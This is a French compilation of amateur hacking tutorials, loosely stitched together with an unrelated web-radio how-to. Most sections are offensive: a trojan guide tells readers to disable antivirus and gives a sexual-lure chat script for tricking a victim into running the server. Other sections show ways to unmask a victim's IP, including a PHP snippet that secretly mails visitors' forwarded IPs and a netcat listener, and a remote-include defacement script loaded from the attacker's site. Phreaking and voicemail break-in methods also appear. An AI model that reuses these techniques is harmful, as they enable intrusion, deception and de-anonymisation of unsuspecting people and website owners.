2 : Types de virus On classe les virus de 5 façons :

a) Virus du secteur d’amorce ; ils remplacent l’amorce d’un disque par leur propre code et se chargent ensuite en mémoire centrale. Il rendent inutilisable le disque d’amorçage et/ou se propagent vers d’autres disques.
b) Virus de fichiers ; ils ajoutent leur code aux fichiers exécutables (*.exe *.com *.bat ) et se chargent en mémoire centrale afin de contaminer encore d’autre programmes. Il rendent ces programmes inutilisables.
c) Virus furtifs ; ils échappent à toute détection en se camouflant. Une des méthodes de détection consiste à enregistrer la longueur d’un programme (si le virus a ajouté son code, on peut facilement comparer avec une simple sauvegarde de ce progr. )
d) Virus polymorphes ; ils modifient leur aspect à chaque nouvelle infection.
e) Virus cryptés ; ils modifient leur code, ce qui complique leur détection. On peut ajouter 2 cas, mais souvent moins fréquents à cause de leur puissance :
f) Cheval de Troie ; bombe à retardement implantée dans un programme. Il peut se déclencher à tout moment ou attendre un signal externe. Ce n’est donc pas un virus puisqu’il n’est pas conçu pour se reproduire et se propager.
g) Bombe logique ; variante du cheval de Troie, elle attend un signal externe pour exploser. Ce signal peut être une date précise, un lancement d’un certain programme etc.. Les dégâts causés par cette bombe peuvent être d’ordre matériel des fois, comme une modification du BIOS pour entraîner une surcharge électrique

Fichier texte décrivant certain virus

3 : Symptômes d’une attaque

Voici les principaux symptômes :
*Un chargement d’un programme plus long que d’habitude.
*Un réseau anormalement chargé.
*Mémoire centrale insuffisante.
*Espace disque réduit.
*Taille de fichiers qui s’accroît anormalement.
*Système et/ou programmes qui plantent.
*Messages d’erreurs ou messages curieux.
*Un jeu de ping-pong apparaît.
*Les caractères s’écroulent.
*Mélodies bizarres au format midi.
*Accès disque multipliés.
*Perte de fichiers et de données.
*Programmes refusant de s’exécuter ou s’exécutent mais de façon anormale. *Autoformatage du disque dur.

4 : Fichiers cibles des virus

Le premier objectif est la contamination de une ou plusieurs cibles qui lui permettront d’être relancé le plus souvent possible. Une cible est appelée vecteur de contamination. En principe, il existe 3 phases d’existence :

Infection ; le virus infecte le système cible. Contamination ; il se duplique et infecte d’autres cibles sans perturber le fonctionnement du système.
Destruction ; il entre en activité et produit les effets pour lesquels il a été programmé.

Cibles des virus :
-Fichiers exécutables, surtout les .COM (avec le très célèbre COMMAND.COM qui est lancé à chaque démarrage du système ).
-Fichiers systèmes, particulièrement les IO.SYS et MSDOS.SYS (qui sont lancés au démarrage du système aussi) .
-Les fichiers temporaires de recouvrement .OVL .
-Fichiers binaires .BIN. -Fichiers pilotes .DRV.
-Le secteur de la table de partition du disque dur (lu par le BIOS à chaque initialisation) ou d’une disquette BOOT.

Trojan 2

Les trojans

Le troyen ( trojan pour les intimes) est selon moi une technique réservé au débutant mais qui est quand même assez drôle a condition de pas faire le con. En effet, si vous infectez quelqu'un, vous pourez faire tous ce que vous voulez de son pc: l'éteindre, récupérer son mot de passe, désactiver le clavier... et des choses encore pire que je ne détaillerai pas ici. En vous introduisant sur un pc, vous transgresser la loi et les peines peuvent être lourde. De plus, a partir du moment ou la victime se rend compte qu'elle est infecté, elle peut très facilement riposté. Comment? Cela sera abordé dans cet article, qui n'a pas pour vocation de vous donner le mode d'emploi pour s'introduire sur un pc mais plutot de vous informer sur les risques que vous courez et les moyens de vous défendre.

Un troyen, c'est quoi ?

Le cheval de Troie vous connaissez ? C'est un truc en bois construit pas des mecs en armure pour prendre une ville fortifiée par la ruse... Si ça s'appelle comme ça, vous l'aurez compris, c'est parce que ça reprend la méthode... La forteresse c'est le PC, le cheval c'est le programme, l'assaillant c'est toi et la victime c'est le pigeon. Si tu réussi, la victime est mal barré. Le problème consiste à envoyer un fichier infecté à la victime en lui faisant croire que c'est autre chose. Si elle l'ouvre et que vous avez son IP vous pouvez vous balader dans son PC ... !

Comment ça marche ?

Un trojan est composé de deux parties : le client et le serveur ! Le client c'est ce que vous allez utilisez pour débarquer chez la victime et le serveur c'est la partie piegée que votre victime va exécuter. Pour les attardés je signale qu'il ne faut jamais, mais alors JAMAIS ouvrir le fichier serveur sous peine de me voir débarquer sur votre disque dur avec des intentions plus que mauvaises. Nan, c'est une blague ... mais bon c'est juste qu'il faut être prudent avec les trojans !

Au fait, il se peut que votre antivirus s'excite quand vous exécutez le troyen. Sachez que c'est entièrement normal et que c'est la preuve que l'antivirus est prudent. Mais les hackers travaillent 100 % sans antivirus en reposant leur capacité à se protéger sur leur connaissances personnelles. Alors si vous voulez utiliser le troyen vous avez plus qu'à l'éteindre !


Qu'est ce qu'il faut faire ?

J'imagine que vous avez compris que le principal problème est de faire ouvrir le serveur à la victime . pour cela il y a le Social Ingeneering !!! C'est l'art de contrôler votre victime avec la psychologie.

Voici un exemple sur un chat :

Ici, sexy-girl c'est le hacker et pigeon bah.... la pigeon !

sexy girl: Salut tu peux m'aider SVP ?

pigeon :Oui, C'est sur c'est quoi ton prob?

sexy girl: ma boite aux lettres caramail déconne, tu peux me mailer pour voir si elle fonctionne ?

pigeon: ok, je veux bien mais j'ai quoi en échange ?

sexy girl : bah si ça marche, je te renvoie ma photo de moi à poil!

pigeon :Youhouhhh!!! Super ! Ok, je te mail tout de suite !

sexy girl: Merci t'es gentil..!


Voila, c'est dans la poche !! Vous recevez le mail, et lui envoyer le SERVEUR du troyen comme photo !!!

Si le mec dis que son antivirus s'excite, alors c'est perdu ....

Mais si il dit que la photo marche pas , c'est qu'il a cliquer sur le trojan...

Plus d'infos sur les trojans:

Comme vous pouvez vous en doutez, infectez quelqu'un est très facile. En effet, l'internaute lambda (90% des surfeurs) se fait avoir a tous les coups.

Ceci est en grande partie du à la puissance des troyens dernière génération. Prenons optix pro par exemple, qui est sans doute un des troyens les plus puissant, le fichier serveur n'est pas fournit dans le package, il y a un fichier edit server qui permet de créer le dit serveur en parametrant des tas d'options. Entre autre fonction, il y a le choix de l'icone (setup, zip, rar...) et la possibilité de recevoir les ip sur icq. En clair, dès qu'un mecs infectés se connecte, le serveur envoie un message sur votre pager icq. De plus, beaucoup d'antivirus ne le reconnaisse pas. Il n'a donc aucune chance d'en réchapper sauf si il a déjà lu cet article qui va maintenant expliqué comment contré une attaque.

D'abord, comment savoir si je suis infectés?

Quand un PC est infecté, le mecs qui a installé le trojan et qui veut s'amuser va faire faire tout un tas de connerie a votre ordi. Il va ouvrir votre lecteur cd, éteindre votre écran, bloquer votre clavier, inverser les touches de la souris, faire disparaitre le menu démarer... et la liste est encore longue. Si vous remarquer un des ces symptomes (ou un autre trucs bizarre), vous êtes peut être infectés.

Je suis infecté! Que faire!!!

Donc si vous constater quelquechose de bizarre, le 1er réflex est de couper la connexion. Ensuite il va falloir installer un pare feu. C'est bien gentil tout ça, mais il faut se connecter pour telecharger le pare feu. Et c'est justement là le problème, soit vous avez un autre PC, vous télécharger le pare feu et vous le transférez sur le pc, soit il va falloir se connecter. Si vous avez un antivirus non mis à jour, vous pouvez toujours essayer de le mettre vite fait à jour pour que le cas échéant il arrive a vous débarraser du serveur, mais c'est souvent peine perdu, le mecs qui vous hack a surement déjà bousillé votre antivirus. Donc attendez quelques heures avant de vous reconectez, télécharger en vitesse zone alarm, paramétrez le ,définissez les accés, et attendez. Maintenant que vous êtes protégé, 2 choix s'offre à vous: -je veux choper ce petit merdeux ou -je veux me débarasser de cette saloperie au plus vite. Pour la 2nd solution, allez sur un antivirus online gratuit comme celui de panda, qui est efficace. (panda active scan) et regardez si il détecte la bête. Si vous optez pour la première solution, attendez que le mecs essaye de se connectez et paf!, zone alarm détecte que quelquechose de non autorisé essaye de pénétrez sur le pc, et non seulement vous l'avez bloquer, mais en plus vous avez choper son IP. Grace à elle, vous allez pouvoir porter plainte au fournisseur d'accé. Notez bien ce l'IP et l'heure a laquelle l'attaque a été lancé. Ensuite, renseignez vous sur les moyens d'agir.

Comment trouver une ip

Comment trouver une IP

L'IP est la base du hacking : elle permet d'identifier un ordinateur de particulier ou un serveur connecté sur internet. C'est la seule

façon de pirater quelqu'un car il faut l'identifier. Ce tutoriel va donc vous enseigner comment faire pour trouver une IP !

Voici comment voir votre IP :
Quand vous etes connectés, faites : "demarrer/executer/winipcfg"
Une fenetre va s'ouvrir et il y aura pas mal d'infos, dont votre adresse IP...
Trouver l'adresse IP d'un type :
Technique 1 : Trouver l'IP d'un gars sur IRC.
Faites juste whois pseudo_du_mec
Cette technique, peux suffire, ca depend de votre config, du serveur utilisé etc...
Mais si ca suffit pas, faites la deuxieme technique.
Technique 2 : Encore pour IRC :
Bon, bein cette fois-ci vous faites
/who pseudo_du_type %in
Et dans la fenetre "status" vous aurez son IP.
Si jamis ca marche toujours pas, employez la maniere forte en faisant la 3eme technique : elle marche a touts les coups Wink
Technique 3 : Toujours sur IRC :
Pour cela, taper : /whois pseudo_du_type
Et la, dans la fenetre "status", il y aura des infos sur ce type.
La regarder dans toute les infos qu'on vous donne et trouvez un truc le genre:
~v493@EVYVUV4z.ipt.aol.com
ou
~v827@Xocse7im7Qs3A8sUs30I.abo.wanadoo.fr etc...
Ensuite vous lancez le logiciel "FuckDax" et dans la case vide nommée "Host code" vous mettez le charabia que vous vous avez
trouvé en faisant "whois ...". Ensuite cliquez sur "Decode".
Et dans la case "Adresse IP" va apparaitre l'adresse IP de votre futur victime.
Tout simplement :-@

Technique 4 : Trouver l'IP d'un mec sur ICQ :
Cliquez avec le bouton droit sur le pseudo du mec plus allez dans "user's details"
La on vous donnera son adresse IP.
Mais ce qui est con c'est qu'il y en a qui cache leur adresses IP (y'a marqué N/A a la place)
Mais ce qui est con pour eux, c'est qu'il existe quand meme un moyen de trouver leur IP :-)
Pour cela, laissez la fenetre info ouverte, mettez votre ICQ sur "offline" et fermez la fenetre info.
Maintenant refaite la meme chose qu'au début (quand c'etait écrit N/A)
Et voila, son adresse IP est enfin accessible :-)
Et si ca marche toujours pas, envoyez un méssage a la victime suivi d'un "netstat -n" ,
vous trouverez pleins d'informations sur l'ordinateur: l'ip, les troyens infectés, etc...

Technique 5 : Trouver une IP par mail:
Bein toujours aussi simple, vous envoyez un mail (vous y foutez ce que vous voulez), le principal etant que votre victime réponde.
Et des que vous recevez le mail de votre victime, vous faite un clic droit sur le mail et vous cherchez un truc genre "proprietes" ou
"statut" etc...
PS: A noter que sur AOL, l'IP se trouve en fin de mail...
Technique 6 : Trouver une IP sur caramail:
Avoir l'IP d'un membre. Cette methode est la seule connue.
Pour avoir son Ip, il faut que cette personne vous écrive un message.
Ouvrez-le et allez dans "en-tete". L'Ip s'y trouve.

Technique 7 : Trouver une IP avec votre firewall
Si vous etes equipés d'un firewall, vous avez du remarquer que quand un hacker tente de vous hacker, votre firewall réagit et il vous
affiche l'IP de la personne qui vous attaque...
Voila, tout simple ;-)


Technique 8 : Trouver une IP sous AOL
Il faut que votre victime ai AOL et que vous parliez avec elle grace aux mess eclairs.
Il faut le logiciel Serv-u
Allumez serv-u, un petit icone s'allume en bas a droite. Faites un clic droit sur cet icone et choissisez "Start Serv-U". Puis choisissez
"Start Administrator".
Dans la fenetre qui s'ouvrira, allez dans le menu "help" puis choissisez "Local IP Adress".
Dans une petite fenetre, votre adresse IP sera affichée. (Oui j'ai bien dit VOTRE adresse IP)

Maintenant retourner sous AOL et envoyez un message eclair a votre victime. Dans le

message, créez un lien hypertexte avec comme adresse: ftp://votre_adresse_IP/ et comme description ce que vous voulez (choissisez

quelque chose qui apatera votre victime car pour avoir son IP, il faut qu'elle clic sur votre lien hypertexte).

Des que votre victime aura cliquer sur le lien, l'icone en bas a droite devient bleu, revenez sous serv-u et dans la fenetre il y aura

d'ecrit, l'IP de votre victime.

PS: Pour creer un lien hypertexte dans un message eclair, faites un clic droit

sur la fenetre des messages eclairs, puis choisissez "Créer un hyperlien..."

Alors, c'est pas beau ca ?? ;-)

Bon c'est juste quelques techniques mais vous pouvez en trouver d'autres ...

La premiere chose a faire pour trouver des astuces c'est réfléchir Wink

Trouver une IP d'un Serveur

Maintenant on passe aux choses sérieuses Smile

Pour trouver l'IP d'un serveur faites :

Cliquez sur Démarer

Exécuter

Et tapez ping www.lesite.com

l'adresse sera renvoyé dans la réponse du serveur.


Avoir l'IP réelle d'un gars derriere son Proxy

hello, en fait je vais vous exposer ici quelques techniques vous permettant de recuperer l'IP reelle d'un gars se

connectant au net par l'intermediare d'un proxy. En effet dans ce cas vous voyez l'IP du proxy, et non la sienne.

C'est le but d'ailleurs, non ?

Mais on va pas se laisser demonter %-)

** (PETITE NOTE PERSONNELLE : Pour avoir une simple IP, il y a moult methodes, vous les apprendrez facilement sur

le Net ... Ou dans un prochain tuto) **

Donc je vais exposer 2 methodes.

* 1 ere methode, est en fait un melange d'infos recoltees sur le net et de reflexion personnelle qui vous permettra de recevoir dans votre boite mail l'IP d'un gars qui se promene sur une de vos

pages sur un site. Pour cela votre site doit etre heberge sur un serveur supportant PHP, avec la fonction mail();

activee (actuellement c'est le cas de Lycos/Multimania, les autres je sais pas).

L'idee est donc que les proxies sur lesquels se connectent les gars envoient souvent dans le Header des infos,

dont la fameuse IP. Ces donnees envoyees par le serveur se nomment les VARIABLES D'ENVIRONNEMENT. Les variables

d'environnement standard permettent d'ailleurs de recuperer l'IP d'un gars, mais ce n'est pas le but de notre tuto...

Ici nous nous interesserons aux variables d'environnement propres aux proxies HTTP, qui sont au nombre de 6 :

HTTP_PRAGMA Ancien mecanisme de gestion des methodes de cache des pages d'un serveur HTTP

HTTP_CACHE_CONTROL Indication concernant les preferences du client HTTP en matiere de cache

HTTP_CACHE_INFO Utilise par certains proxys pour indiquer au serveur HTTP combien de clients HTTP

ont effectue cette requete par son intermediaire

HTTP_PROXY_CONNECTION Seulement definie par certains proxys lorsque le client HTTP effectue sa requete par leur

intermediaire

HTTP_VIA Adresse, port utilise, nom et version du proxy utilise pour la requete. Seulement definie par certains proxys

HTTP_X_FORWARDED_FOR Utilise par certains proxys pour indiquer l'adresse de la machine cliente pour laquelle

ils effectuent la requete HTTP

Je tiens d'ailleurs a remercier ici "Le Lamerz" (qui n'en est pas un d'ailleurs !!!) pour ces precieux renseignements !

^_^ Merci

Ici la variable qui nous interesse est la derniere, HTTP_X_FORWARDED_FOR, qui contient l'IP du gars derriere le proxy.

L'idee est donc que le serveur sur lequel est heberge votre page PHP lit les informations envoyees par le proxy se connectant

a lui, donc cette variable. Il est donc capable de la restituer par la fonction PHP getenv("param"); qui recupere la variable

d'environnement nommee "param". Donc


demande a votre serveur d'hebergement de stocker dans la variable $vraieip la vraie IP, c'est a dire le contenu de la

variable d'environnement HTTP_X_FORWARDED_FOR. Vous pouvez l'afficher a l'ecran pour faire peur au gars, avec


"print $vraieip;"

mais notre but est de la recuperer discretement, en nous l'envoyant par mail. Il suffit de coder ceci :

$vraieip = getenv("HTTP_X_FORWARDED_FOR");

mail("votre_mail@serveur.ext", "IP recoltees sur ma page internet", $vraieip);

?>

et si comme je vous le disais au debut votre serveur d'hebergement accepte la fonction mail(); c'est dans la poche !

Pour ma part j'ai inclut ce script une journee sur mon site, juste pour tester, mais j'ai ete litterallement mail bombe !!!

En effet le serveur renvoie l'IP a chaque reactualisation. Je l'ai donc vite retire, puisque de toute facon mon but n'est pas

de hacker mes visiteurs.

PAr contre si le gars ne passe pas par un proxy, la variable reste vide, vous devez donc envoyer par mail l'IP provenant de

HTTP_X_FORWARDED_FOR, mais aussi celle de la variable d'environnement classique permettant de recuperer l'IP normale

* Une 2eme methode, montree par Hyatus (je sais pas si il l'a trouvee tout seul), sur le forum de http://www.newffr.org.

Elle consiste toujours a amener le gars sur une page internet concoctee par vos soins :p

Cette fois-ci pas besoin de PHP, juste un script javascript, a lancer au chargement de la page, le voici :



Voici le texte fourni par Hyatus en explication :

-------

Alors que vous pensiez etre anonyme derriere votre proxys... Je vous demontre le contraire !

Pourquoi ? Comment ?

Simplement par ce que le proxy utilise le protocole HTTP, et n'est fonctionnel qu'a travers

les structures utilisant HTTP, or la j'ai engendre sur votre navigateur une connexion Telnet

a mon serveur sur le port 25 (sendmail) ...

Je verrai alors dans mes logs votre vraie IP c'est une application reelle !

Mais le meilleur n'est pas la ...

Ici j'ai utilise une connexion reelle de Telnet qui se dirige vers un serveur SMTP dump

mais j'aurais tres bien pu rediriger la connexion vers une petite application qui se

charge de garder les logs et DANS CE CAS VOUS N'AURIEZ SIMPLEMENT RIEN VU !

Donc ne croyez pas que le proxy soit quelque chose de fiable, bien au contraire !

Bien Amicalement,

hyatus

-------

Maintenant mes explications et eclaircissements apres analyse

Vous devez remplacer Hanidz.com par votre serveur, ou mieux votre machine (entre votre IP, je sais c'est dangereux).

C'est ici qu'intervient l'utilisation du logiciel NetCat (ce qu'il appelle l'application qui garde les logs, c'est ca !)

fourni avec un tuto d'explication. Il suffit dans le script de mettre votre IP au lieu du serveur, et sur votre machine

de lancer NetCat en mode ecoute (listen) sur le port 25 (port sendmail). La commande est, apres avoir lance natcat,

"-l -p 25".

Ainsi vous ecoutez tout ce qui vient sur votre port 25.

Dans notre exemple le script ouvre chez la victime ouvre son port telnet (23) et se connecte a votre IP au port 25.

Le script si votre IP est 145.167.4.34 sera :



Cette technique oblige donc le navigateur du gars a se connecter a votre IP sur votre port 25.

En effet les proxies filtrent les connections HTTP (port 8080), mais pas Telnet (25), donc le fait d'obliger le gars a

se connecter a votre serveur (netcat en fait) vous devoilera son IP en regardant dans vos logs de netcat.

Et voila vous avez eu vos 2 methodes !!!!!

Si il chaine les proxies, je ne peux rien pour vous, ou alors allez vous faire embaucher a la DST, eux ils sont forts, mais

il faut dire qu'ils ont la loi de leur cote J



J H4ni J

Faille IE : spoofing d'url

Faille IE: spoofing d'URL

Voici une faille qui, bien que pas des plus graves peut être dangereuse. En effet, elle permet a n'importe qui de masquer la vraie URL s'affichant dans la barre d'adresse en la remplaçant par l'adresse définit par la personne mal intentionné.
Cette faille concerne Internet Explorer à partir de la version 5.5 et ses dérivés (Crazy Browser, myIE...) exepté la dernière version de my IE. Je n'ai pas pu tester sous Netscape, si vous trouvez un navigateur touché par la faille, merci de le mettre en commentaire. Même IE Sp1 est touché par ce problème. A ce jour, aucun patch n'est encore sortit. Merci microsoft.

Donc grâce à cette faille, on peut faire croire à une personne qu'elle surfe sur un site alors qu'elle en est sur un autre. Pour ce faire, Il faut juste insérer le caractère 0x01 avant le signe @ dans une URL de type http://user@domain. De cette manière, Internet explorer n'affiche pas le vrai domaine mais uniquement le nom de l'utilisateur.

Faite votre radio sur le web

Faites votre radio sur le web

Cette page conçu pour vous montrer comment se créer une Web Radio avec Winamp.

Tout d'abord, il vous faut Winamp v2.80 (Ne prenez surtout pas la version
3, cela ne fonctionnera pas) - Site
Officiel.

Une fois que vous avez téléchargé et installé winamp, vous allez pouvoir
télécharger ces 2 plug-in (il faut a tout
prix les avoir tout les 2 sinon ca ne fonctionnera pas non plus)

¤ Shoucast Source
¤ Shoutcast Server

Maintenant nous allons commencer l'installation et la configuration des
2 plug-in, véréfiez bien que winamp est
correctement fermé.
1/ Installer shoutcast-1-8-9-windows.exe
2/ Installer shoutcASP.exe
3/ Ouvrir Winamp
4/ Allez dans Option > Préférences (CTRL+P) et clickez sur DSP/Effect

5/ Clickez sur "Nullsoft SHOUT Cast Source DSP v1.8.2 (dsp_sc.dll)"
et ensuite clickez sur le bouton
configuration
Une fenêtre s'ouvre se nomant "SHOUT Cast Source" - Vous pouvez
fermer la fenêtre des préférences.
6/ Dans l'onglet OUTPUT, mettez votre IP (IMPORTANT: ne changez surtout
pas le Port ni le password !!)
Si vous savez pas comment avoir son IP, il existe 2 manières de le connaitre,
soit avec Net Meeting soit en
allant dans "Démarrer > Exécuter" et vous tapez "C:WINDOWSWINIPCFG.EXE"

Dans l'onglet Encoder choisissez votre encodage pour les petites connections
(Cable, ADSL 1), il est conseillé
d'avoir un encodage soit à 24kbps 22050kHz Mono (possibilité d'avoir plus
d'audience mais d'avoir un son de
mauvaise qualité) ou bien un encodage a 48kpbs 22050kHz Stéréo (moin d'audience
mais son de meilleur qualité).
Maintenant c'est a vous de choisir Smile

Maintenant nous allons procèder à la connection de tout ce petit merdier.

1/ Lancer le fichier sc_serv.exe (répertoire "C:Program FilesSHOUTcast"
)
2/ Clickez sur CONNECT dans l'onglet Output. Normalement si tout fonctionne
bien, vous devriez avoir ceci a été
dans la case status: [0D 0:00:00] Sent 0 byte
Il vous reste plus qu'à lancer votre music et le tour est joué
Pour écouter votre radio, il suffit tout bètement de mettre cette adress
dans winamp (CTRL+L):
http://votre_ip:8000

c'est fini

Phreaking

Phreaking

Préambule
Avant d'aborder le sujet du phreaking, voici un glossaire des thèmes utilisés dans cet article :



Boxing : Le " boxing " est l'art de créer des montages (initialement électroniques mais qui peuvent être réalisés en soft) pour pirater les lignes téléphoniques ou les détourner.


Card trashing : Méthode dite de " fouille des poubelles " pour trouver des numéros de cartes bancaires afin de recharger gratuitement des cartes téléphoniques.


PABX : Un PABX (Private Automatic Branch eXchange) est un système permettant de gérer informatiquement un grand nombre de lignes de téléphonie. On peut accéder au PABX par l'extérieur (modem, téléphone) ou par l'intérieur (PC, VAX, terminal). Un PABX peut se commuter sur le réseau externe de l'entreprise et l'on appelle alors cela un " outdial ". Un PABX peut être complété par un boîtier RMA, qui est un élément permettant une interconnexion d'un réseau et d'un PABX à des fins de management distant.


VMB : C'est une boite vocale qui repose sur le PABX, comme on peut en trouver sur la plupart des entreprises.


Introduction
Le Phreaking est à la téléphonie ce que le hacking est au réseau.....

On comprend par phreaking toutes les méthodes pour pirater un système lié à la téléphonie. Cela comprend la corruption et le détournement de PABX, de VMB, de téléphone portable, de modem, etc.

Le but ultime est de téléphoner gratuitement.

A noter que le terme phreaking provient de la contraction des deux mots anglais phone (téléphone) et freak (monstre) pour aboutir au terme phreaking.

Pour cela il existe de nombreuses méthodes, notamment le passage par un PABX

Le but d'un phreaker est d'appeler gratuitement ses copains ou des services téléphoniques payants.

La méthode la plus représentative du phreaking est d'essayer de pénétrer une boîte vocale sur un PABX et de se servir de la fonctionnalité de transfert d'appel.

Mais reprenons depuis le début.

D'abord, qu'est-ce qu'un PABX ? C'est un système qui gère plusieurs lignes téléphoniques. Typiquement, quand vous téléphonez à une compagnie et que vous entendez un joli message enregistré qui vous demande d'appuyer sur " 1 " pour avoir tel service, sur " 2 " pour tel autre, etc., c'est qu'il y a un PABX au bout qui gère les appels.

Une méthode souvent utilisée par les phreakers est de scanner des numéros de téléphone, tout comme un hacker scannerait des ports IP. A la différence près que scanner un numéro de téléphone demande de payer la communication et que si un phreaker scanne beaucoup de numéros, la facture sera lourde, ce qui est totalement contraire au but recherché !

Donc, en fait, les phreakers essayent généralement de scanner ... les numéros verts ! (qui présentent donc l'avantage d'être gratuits). A moins qu'ils n'aient récpéré une liste pré-établie de PABX (sur Internet par exemple).

Signalons que ce scan peut être réalisé automatiquement à l'aide d'outils spécifiques ou à la main, pour les courageux.

Une fois que le phreaker est arrivé à tomber sur un PABX, sa prochaine mission va être de trouver la séquence permettant d'accéder aux boîtes vocales. Cette séquence peut être du style " ** " ou " 0# " et si le PABX la reconnaît, il demandera le numéro de boîte vocale puis le mot de passe.

Les numéros de boîte vocale ne sont généralement pas difficiles à deviner ou à trouver (par social engineering par exemple). Il faut ensuite trouver le mot de passe et souvent les boîtes vocales ne laissent que 3 possibilités avant de se bloquer. Il faut donc oeuvrer avec méthode. La technique la plus utilisée est de tenter les mots de passe par défaut usuels (1234, 1111, 5555, etc.). Ces mots de passe dépendent généralement du constructeur du PABX et ils peuvent être trouvés tout simplement sur Internet.

Une fois que le phreaker a saisi la séquence de touche permettant d'accéder aux boîtes vocales, le numéro de la boîte piratée et le mot de passe, il peut faire pratiquement ce qu'il veut : changer le message d'accueil, écouter les messages, les effacer, etc.

Mais ce qui l'intéressera par dessus tout, c'est la présence d'une fonction de renvoi d'appel, car à ce moment là, il lui suffit de programmer la boîte vocale pour qu'elle " switche " sur un autre numéro quand on l'appelle.

Il ne reste alors plus qu'au phreaker qu'à raccrocher et à rappeler la boîte vocale pour être différé automatiquement sur le numéro programmé sur le transfert d'appel.

Le boxing
Le Boxing est une technique de phreaking qui consiste à faire des montages (hard ou soft), généralement assez simples (quoique ...), qui ont pour but de pirater ou de détourner des lignes informatiques.

La grande liste des box a démarré avec la Blue Box. La première Blue Box a été créée dans les années 60 aux USA par des étudiants du M.I.T. La technique consistait à appeler un numéro vert et à lui envoyer un son qui fait croire au centrale que la ligne est redevenue libre. A partir de là, on peut téléphoner n'importe où, gratuitement, comme si on appelait toujours un numéro vert.

Il existe de nombreuses box différentes. Citons également la Beige Box, qui est la plus simple de toute. Il suffit d'acheter un téléphone standard, de couper la prise du téléphone et d'y mettre des pinces crocodiles. La Beige Box se connecte ensuite à n'importe quel fil téléphonique et permet de téléphoner au frais du propriétaire du fil téléphonique.

Une multitude de type de box existe. Toutes les couleurs sont pratiquement répertoriées (White, Black, Red, Yellow, Magenta, Mauve, Violet, Gold, Silver, Brown, Aqua ... ) et certaines portent des noms vraiment exotiques (Cheese, Jack, Pearl, Chartreuse, Acrylic, Lunch, Scarlet, Urine ...).

Le card trashing
Le card trashing est une méthode qui tend à disparaître, car elle consiste à essayer de récupérer des tickets de carte bancaire, avec les informations complètes du titulaire du compte. Or, des préconisations ont été données pour ne plus afficher le numéro de carte complètement. Néanmoins, certains endroits étaient réputés pour faire du card trashing, comme les pompes à essence par exemple.

L'utilisation des données bancaires permet bien entendu de multiples fraudes, mais dans le cas du phreaking, ces données permettent de regénérer des unités de cartes téléphoniques, et donc ... de téléphoner gratuitement.

Le trashing en général peut aussi être utilisé pour trouver des numéros d'identification de téléphones cellulaires. A ce moment là, il doit être pratiqué dans les poubelles des opérateurs de téléphonie cellulaires.

Téléphones cellulaires
Un autre moyen de téléphoner gratuitement est d'utiliser son propre téléphone cellulaire, mais en se faisant passer pour un autre utilisateur.

Pour cela, il faut récupérer un identifiant, ce qu'on appelle un ESN. Le trashing peut y aider. On peut aussi utiliser une méthode plus sioux : le snarfing, qui consiste à intercepter l'identifiant grâce à une " box " spéciale.

Une fois un ESN récupéré, il faut re-programmer le téléphone cellulaire, soit par ordinateur, soit par l'introduction d'une autre puce.

Ce type d'attaque est essentiellement perpétré sur les téléphones cellulaires analogiques (qui ne sont plus vendus d'ailleurs). Pour les téléphones numériques, la méthode consistera plutôt à essayer de simuler une carte téléphonique. Ces attaques sur réseau cellulaire sont essentiellement perpétrées aux Etats-Unis.

Conclusion
Plusieurs autres méthodes existent pour téléphoner gratuitement, à partir des cabines téléphoniques par exemple.

Notons quand même que certains pays ont un réseau téléphonique plus facilement " phreackable " que d'autres, et notamment les Etats-Unis.

Rappelons enfin que si beaucoup de compagnies pensent à protéger leurs accès Internet, elles devraient en faire de même de leurs accès téléphoniques !

Faille include 2

Faille !!include!! infos ou intox ?

Il suffit de taper sur google : faille php !include!, pour obtenir des tonnes de sites sur le hacking et une faille sur la fonction !include! !

Infos ou intox ?

Voici la faille décrite en détails :

------------------------------------
Vous savez tous que l'avantage du PHP sur l'HTML est que le PHP est dynamique, ça veut dire que vous pouvez changer le contenu des pages visionnées. L'URL si dessus charge une page index.php dite "normale" puis y inclut le code de la variable $page, suivit de l'extension PHP bien évidemment. Dans notre exemple la page qui sera visible sera donc la page Team.php.
En conclusion http://www.site.com/index.php?page=Team revient à indiquer l'URL http://www.site.com/Team.php
La faille d'!include! est une faille courante présente sur un grand nombre de sites. Elle est de plus trés simple à exploiter.
--> la localiser : Il faut trouver un site avec des url du type :

www.lesite.fr/index.php?url=page.php
http://www.site.fr/index.php?var=admin.php

Pour vérifier si la faille est présente , on va donc essayer "d'inclure"notre URL :
http://www.lesite.fr/index.php?url=http://www.google.fr ou http://www.site.fr/index.php?var=http://www.google.fr
Là si l'index apparait dans le site , c'est que le site n'est apparament pas protégé

Pour defacer le site

On va donc pouvoir essayer d'ajouter du code en utilisant la fonction
fwrite() ce qui aura pour effet de déffacer l'index du site !
Il suffit de faire ce petit scipt php et de le stoker sur un compte :

$fp=fopen("index.php", w);
$msg="le message de ton defacage ";
fwrite($fp,$msg);
fclose($fp);
?>

Voila, maintenant il suffit de faire comme on a vu plus haut , admettons que ta page du script se nomme deface :

www.lesite.fr/page.php?url=http://[mon site]/deface.php

Voila , c'est pas plus compliqué que ça.

___________________________________

mais je pense que ce tuto est faux car si vous faite cela,

: $fp=fopen("index.php", w);

cela écrit sur VOTRE page index.php Sad
j'appelle cela :
Se hacker soit même ! !!!!!!!!!!!!!

Voila.

il faudrait taper : $fp=fopen("http://[lesitecible]index.php", w);

mais cela ne marche pas.

Avec une modification en local de son phpinfo(), la fonction !include! permet peut etre l'inclusion de fichier distant ?

Pds bannieres

PDS-BANNIERES

Pds-bannières est un script PHP qui vous permettra d'installer sur votre site un véritable échange de bannière mais aussi en même temps un échange de bouton (88*31).

Ce script à eu pas mal succès et provient du site : www.plusdeservices.com qui n'existe plus de nos jours.

Malheureusement il est à l'origine d'une grosse faille de sécurité qui a coûté une petite intrusion dans ensemble de la base SQL et la petite trace sur la page d'accueil à plusieurs webmaster.

Je rappelle à se passage que la vraie définition du hacker et celui qui trouve des failles et permet à la victime de sécuriser son site et non pas collecter des informations ou défacer sa page d'accueil.

Cette faille était présente sur le site http://actu-music.com qui d'après sa page d'accueil a fait les frais d'un mauvais plaisantin (qui pense sûrement d'ailleurs être un grand hacker).

Explication de cette faille:

Tous les webmaster qui connaisse le PHP se servent des variable d'environnement du type : pour connaître l'adresse IP de la personne...

PHP propose toute une série de variables qui sont déjà implantées dans le langage sans que vous ayez quelque chose à faire, on les appellent les variables d'environnement.

Il en existe une très utile : $REFERER

$REFERER pour connaître la dernière page visité avant votre site. Cela ne marche pas toujours, mais il est donc possible de savoir si vos visiteurs arrivent de google et, de plus, les mots taper dans le moteur car les variables sont passer par la méthode GET. [ plus d'infos sur la méthode GET ] à cette adresse :

